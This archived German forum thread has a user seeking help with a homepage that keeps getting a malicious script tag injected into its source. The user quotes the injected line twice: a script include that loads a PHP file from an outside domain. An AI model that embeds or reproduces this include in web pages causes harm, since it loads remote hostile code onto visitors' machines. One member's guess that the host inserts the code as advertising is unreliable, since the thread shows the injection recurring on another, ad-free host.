1. Liebe Forumsgemeinde,

aufgrund der Bestimmungen, die sich aus der DSGVO ergeben, müssten umfangreiche Anpassungen am Forum vorgenommen werden, die sich für uns nicht wirtschaftlich abbilden lassen. Daher haben wir uns entschlossen, das Forum in seiner aktuellen Form zu archivieren und online bereit zu stellen, jedoch keine Neuanmeldungen oder neuen Kommentare mehr zuzulassen. So ist sichergestellt, dass das gesammelte Wissen nicht verloren geht, und wir die Seite dennoch DSGVO-konform zur Verfügung stellen können.
    Dies wird in den nächsten Tagen umgesetzt.

Ich danke allen, die sich in den letzten Jahren für Hilfesuchende und auch für das Forum selbst engagiert haben. Ich bin weiterhin für euch erreichbar unter tti(bei)pcwelt.de.
    Dismiss Notice

Homepage mit Virus

Discussion in 'Sicherheit' started by Frau ohne Hirn, Apr 27, 2010.

Thread Status:
Not open for further replies.
  1. Hallo

Eine Bekannte von mir hat nun schon eine ganze Zeit Probleme mit ihrer HP. Sie aktualisiert sie und ein paar Stunden Später geht die Homepage nicht mehr.

Wir haben inzwischen herausgefunden das sich hier im Quellcode ein Link oder wie man das nennen soll einträgt und das das ganze auslöst.
    Allerdings bekommt man das ganze nicht in den Griff.
    Haben inzwischen die Homepage mal auf einen anderen Server geladen sogar da kommt dieser Eintrag.

Der PC wurde Formatiert aber auch das hat nichts gebracht.

Kann mir hier bei meinem Problem vielleicht weiter helfen?????

Die trägt sich in den Quellcode ein: <script src=http://giustaofferta.com/upload/paypal_won_auction.php ></script>

danke schonmal für Hilfe

2. Noch was vergessen. Auf dem PC wurden keinerlei Viren gefunden

3. kalweit

kalweit Hüter der Glaskugel

Wo kann man sich das anschauen?

4. poro

poro Ganzes Gigabyte

Womit wurde die Seite erstellt?
    Die betreffendde Zeile
    <script src=http://giustaofferta.com/upload/paypal_won_auction.php ></script>
    entfernen geht nicht?

5. Die HP wurde mit Publisher soviel ich weis erstellt.

Mann kann den Code entfernen aber wenn man die HP erneuert kommt er wieder

6. kalweit

Glaskugel: ich behaupte mal, es handelt sich nicht um einen Virus, sondern um Werbung, die dein jetziger Hoster in die Seiten automatisch einfügt. Auch in der aktuellen Seite ist der Code drin. Ich würde ein paar Euro pro Jahr in richtigen Webspace ohne diese Einschränkungen investieren. Ansonsten kannst du nichts weiter dagegen tun.

7. Sorry die HP wir mit Frontpage 2003 gemacht.

Was ich aber nicht verstehe die Pferderanch-am-Forst.de Seite ist bei One.com gemacht. Diese Seite ist werbefrei und trotzdem kommt das Problem

8. kalweit

Wie gesagt, der Code wird mit sehr hoher Wahrscheinlichkeit von deinem Hoster eingefügt. Vielleicht einfach mal da nachfragen... :nixwissen

9. Der Horster wurde als erstes zur Tat gezwungen aber von hier kommt es nicht. Würde es von da kommen müssten doch andere HP´s die bei dem gleichen Horster sind auch betroffen sein und nicht nur eine oder?????

10. poro

poro Ganzes Gigabyte

Wenn Eintrag bei Hoster 1 eingetragen, dann komplette Seite zu Hoster 2 kopiert, entfernt den Eintrag natürlich nicht.

Einfach die start.html runterladen, Eintrag entfernen, dann wieder hoch(überschreiben).

11. Ja und wen de HP später wieder aktualliesiert wird kommt es wieder und das kann ja nicht sein

12. steppl

steppl Halbes Gigabyte

Bei mir zeigt es

an.

Vielleicht die Links mal entsch&#228;rfen, bitte (einen Buchstaben entfernen o.&#228;.).

13. Ja und wie bekommt man das wieder weg :-( bin echt am verzweifeln

14. poro

poro Ganzes Gigabyte

Mittlerweile liegt das script wohl in allen Unterordnern.

15. Ja auf jeder Seite ist der Link wieder eingetragen

Thread Status:
Not open for further replies.

Share This Page